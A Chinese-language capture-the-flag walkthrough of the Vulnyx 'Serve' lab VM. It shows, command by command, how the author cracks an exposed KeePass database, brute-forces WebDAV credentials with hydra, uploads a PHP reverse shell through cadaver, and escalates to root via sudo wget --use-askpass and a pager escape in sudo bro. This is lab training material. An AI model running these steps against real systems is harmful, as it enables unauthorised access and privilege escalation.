Vulnyx-Serve-Walkthrough
城南花已开 Lv6

信息收集

服务探测

BASH
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.210 08:00:27:ef:f2:b5 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e5:e5:eb VMware, Inc.

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.029 seconds (126.17 hosts/sec). 4 responded
export ip=192.168.60.210
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Scanning ports: The virtual equivalent of knocking on doors.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.210:22
Open 192.168.60.210:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-26 15:45 CST
Initiating ARP Ping Scan at 15:45
Scanning 192.168.60.210 [1 port]
Completed ARP Ping Scan at 15:45, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:45
Completed Parallel DNS resolution of 1 host. at 15:45, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:45
Scanning 192.168.60.210 [2 ports]
Discovered open port 80/tcp on 192.168.60.210
Discovered open port 22/tcp on 192.168.60.210
Completed SYN Stealth Scan at 15:45, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.210
Host is up, received arp-response (0.0011s latency).
Scanned at 2025-02-26 15:45:57 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:EF:F2:B5 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

扫一下目录

得到一个提示

BASH
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt,log -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.210
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: zip,txt,log,php,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 10701]
/javascript (Status: 301) [Size: 321] [--> http://192.168.60.210/javascript/]
/notes.txt (Status: 200) [Size: 173]
/secrets (Status: 301) [Size: 318] [--> http://192.168.60.210/secrets/]
/webdav (Status: 401) [Size: 461]
Progress: 1245858 / 1245864 (100.00%)
===============================================================
Finished
===============================================================

image

敏感文件泄露

那我们添加后缀再次扫描一下/secrets目录,怀疑凭证是存在kdbx

BASH
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
❯ gobuster dir -u http://$ip/secrets -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt,log,kdbx -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.210/secrets
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt,log,kdbx
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 7]
/db.kdbx (Status: 200) [Size: 2078]

下载到本地,打开一下

得到WebDAV的凭证 admin:w3bd4vXXX

根据提示后面三位需要爆破

BASH
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
❯ wget http://192.168.60.210/secrets/db.kdbx
--2025-02-26 15:59:59-- http://192.168.60.210/secrets/db.kdbx
Connecting to 192.168.60.210:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2078 (2.0K)
Saving to: ‘db.kdbx’

db.kdbx 100%[==============>] 2.03K --.-KB/s in 0s

2025-02-26 15:59:59 (710 MB/s) - ‘db.kdbx’ saved [2078/2078]

❯ keepass2john db.kdbx>hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
dreams (db)
1g 0:00:00:02 DONE (2025-02-26 16:00) 0.4830g/s 316.9p/s 316.9c/s 316.9C/s sunshine1..sweetpea
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
❯ kpcli --kdb=db.kdbx
Provide the master password: *************************

KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/> ls
=== Groups ===
db/
kpcli:/> cd db/
kpcli:/db> ls
=== Groups ===
Papelera de reciclaje/
=== Entries ===
0. WebDAV

kpcli:/db> show WebDAV -f

Path: /db/
Title: WebDAV
Uname: admin
Pass: w3bd4vXXX
URL:
Notes: Notas

利用crunch生成字典,hydra爆破即可

得到密码w3bd4v513

BASH
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
❯ crunch 9 9 -t w3bd4v%%% -o dic.txt
Crunch will now generate the following amount of data: 10000 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 1000

crunch: 100% completed generating output
head dic.txt
w3bd4v000
w3bd4v001
w3bd4v002
w3bd4v003
w3bd4v004
w3bd4v005
w3bd4v006
w3bd4v007
w3bd4v008
w3bd4v009

❯ hydra -l admin -P dic.txt $ip http-get /webdav -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-26 16:10:15
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1000 login tries (l:1/p:1000), ~63 tries per task
[DATA] attacking http-get://192.168.60.210:80/webdav
[80][http-get] host: 192.168.60.210 login: admin password: w3bd4v513
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-26 16:10:20

WebDav上传

WebDav - HackTricks

利用davtest可以测试上传的文件类型

BASH
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
❯ davtest -auth admin:w3bd4v513 -move -sendbd auto -url http://$ip/webdav
********************************************************
Testing DAV connection
OPEN SUCCEED: http://192.168.60.210/webdav
********************************************************
NOTE Random string for this session: q5NHnyI1JGN
********************************************************
Creating directory
MKCOL SUCCEED: Created http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN
********************************************************
Sending test files (MOVE method)
PUT txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_txt.txt
MOVE txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.txt
MOVE txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.txt;.txt
PUT txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_jsp.txt
MOVE jsp SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.jsp
MOVE jsp SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.jsp;.txt
PUT txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_php.txt
MOVE php SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.php
MOVE php SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.php;.txt
PUT txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_shtml.txt
MOVE shtml SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.shtml
MOVE shtml SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.shtml;.txt
PUT txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_cfm.txt
MOVE cfm SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.cfm
MOVE cfm SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.cfm;.txt
PUT txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_asp.txt
MOVE asp SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.asp
MOVE asp SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.asp;.txt
PUT txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_pl.txt
MOVE pl SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.pl
MOVE pl SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.pl;.txt
PUT txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_html.txt
MOVE html SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.html
MOVE html SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.html;.txt
PUT txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_aspx.txt
MOVE aspx SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.aspx
MOVE aspx SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.aspx;.txt
PUT txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_jhtml.txt
MOVE jhtml SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.jhtml
MOVE jhtml SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.jhtml;.txt
PUT txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_cgi.txt
MOVE cgi SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.cgi
MOVE cgi SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.cgi;.txt
********************************************************
Checking for test file execution
EXEC txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.txt
EXEC txt SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.txt;.txt
EXEC jsp FAIL
EXEC php SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.php
EXEC php FAIL
EXEC shtml FAIL
EXEC cfm FAIL
EXEC asp FAIL
EXEC pl FAIL
EXEC html SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.html
EXEC html SUCCEED: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.html;.txt
EXEC aspx FAIL
EXEC jhtml FAIL
EXEC cgi FAIL
********************************************************
Sending backdoors
** ERROR: Unable to find a backdoor for txt **
** ERROR: Unable to find a backdoor for html **

********************************************************
/usr/bin/davtest Summary:
Created: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.txt;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.jsp
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.jsp;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.php
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.php;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.shtml
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.shtml;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.cfm
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.cfm;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.asp
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.asp;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.pl
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.pl;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.html
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.html;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.aspx
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.aspx;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.jhtml
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.jhtml;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.cgi
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.cgi;.txt
Executes: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.txt
Executes: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.txt;.txt
Executes: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.php
Executes: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.html
Executes: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.html;.txt

发现可以上传php类型的文件,利用cadaver上传个webshell

BASH
1
2
3
4
5
6
7
8
9
10
❯ cadaver http://$ip/webdav
Authentication required for webdav on server `192.168.60.210':
Username: admin
Password:
dav:/webdav/> put ../php-reverse-shell.php
Uploading ../php-reverse-shell.php to `/webdav/php-reverse-shell.php':
Progress: [=============================>] 100.0% of 5496 bytes succeeded.
dav:/webdav/> exit
Connection to `192.168.60.210' closed.

用户提权

监听端口

存在teo用户

BASH
1
2
3
4
5
6
7
8
9
10
❯ pwncat-cs -lp 4444
[16:19:12] Welcome to pwncat 🐈! __main__.py:164
[16:19:36] received connection from 192.168.60.210:46166 bind.py:84
[16:19:36] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957
[16:19:37] 192.168.60.210:46166: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@serve:/$ cat /etc/passwd |grep "/bin/bash"
root:x:0:0:root:/root:/bin/bash
teo:x:1000:1000:teo,,,:/home/teo:/bin/bash

同时www-data拥有teo的sudo权限

可以执行wget

BASH
1
2
3
4
5
6
7
8
9
10
11
12
13
(remote) www-data@serve:/$ sudo -l
Matching Defaults entries for www-data on Serve:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on Serve:
(teo) NOPASSWD: /usr/bin/wget
(remote) www-data@serve:/var/tmp$ echo -e '#!/bin/sh\n/bin/sh 1>&0' >aa
(remote) www-data@serve:/var/tmp$ chmod +x aa
(remote) www-data@serve:/var/tmp$ sudo -u teo /usr/bin/wget --use-askpass=/var/tmp/aa 0
teo@serve:/var/tmp$ cd ~
teo@serve:~$ cat user.txt
28bf16070abffab749a16bd11f635474

Root提权

teo用户也有sudo权限,可以执行/usr/local/bin/bro

发现是调用Bropages

其实这就是一个类似man pages的工具

可以直接提权

BASH
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
teo@serve:~$ sudo -l
Matching Defaults entries for teo on Serve:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User teo may run the following commands on Serve:
(root) NOPASSWD: /usr/local/bin/bro
teo@serve:~$ ls -al /usr/local/bin/bro
-rwxr-xr-x 1 root root 600 Nov 10 2021 /usr/local/bin/bro
teo@serve:~$ cat /usr/local/bin/bro
#!/usr/bin/ruby2.5
#
# This file was generated by RubyGems.
#
# The application 'bropages' is installed as part of a gem, and
# this file is here to facilitate running it.
#

require 'rubygems'

version = ">= 0.a"

if ARGV.first
str = ARGV.first
str = str.dup.force_encoding("BINARY") if str.respond_to? :force_encoding
if str =~ /\A_(.*)_\z/ and Gem::Version.correct?($1) then
version = $1
ARGV.shift
end
end

if Gem.respond_to?(:activate_bin_path)
load Gem.activate_bin_path('bropages', 'bro', version)
else
gem "bropages", version
load Gem.bin_path("bropages", "bro", version)
end
teo@serve:~$ sudo -l
Matching Defaults entries for teo on Serve:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User teo may run the following commands on Serve:
(root) NOPASSWD: /usr/local/bin/bro
teo@serve:~$ sudo /usr/local/bin/bro
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::NIL is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::Data is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::TRUE is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::FALSE is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::Fixnum is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::Bignum is deprecated
Bro! Specify a command first!

* For example try bro curl

* Use bro help for more info

teo@serve:~$ sudo /usr/local/bin/bro curl
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::NIL is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::Data is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::TRUE is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::FALSE is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::Fixnum is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::Bignum is deprecated
30 entries for curl -- submit your own example with "bro add curl"

# get the contents of a web page
curl http://bropages.org

bro thanks to upvote (133)
bro ...no to downvote (7)

.................................................................................................................................................

# download a file and write it to another file called myfile.html
curl -o myfile.html http://bropages.org

bro thanks 2 to upvote (66)
bro ...no 2 to downvote (0)

.................................................................................................................................................

# Download a file using its original filename, follow all redirects, and continue where you left off if the download previously failed
curl -LOC - http://foo.bar/file.ext

bro thanks 3 to upvote (56)
bro ...no 3 to downvote (0)

.................................................................................................................................................

# Get my external IP address
curl ifconfig.me/ip

# Get my remote host
curl ifconfig.me/host

# Get my user agent
curl ifconfig.me/ua

# Get port
curl ifconfig.me/port

!/bin/bash
root@serve:/home/teo# cat /root/root.txt
981f4425d4ffcb3fb2fe145463b1d476
root@serve:/home/teo#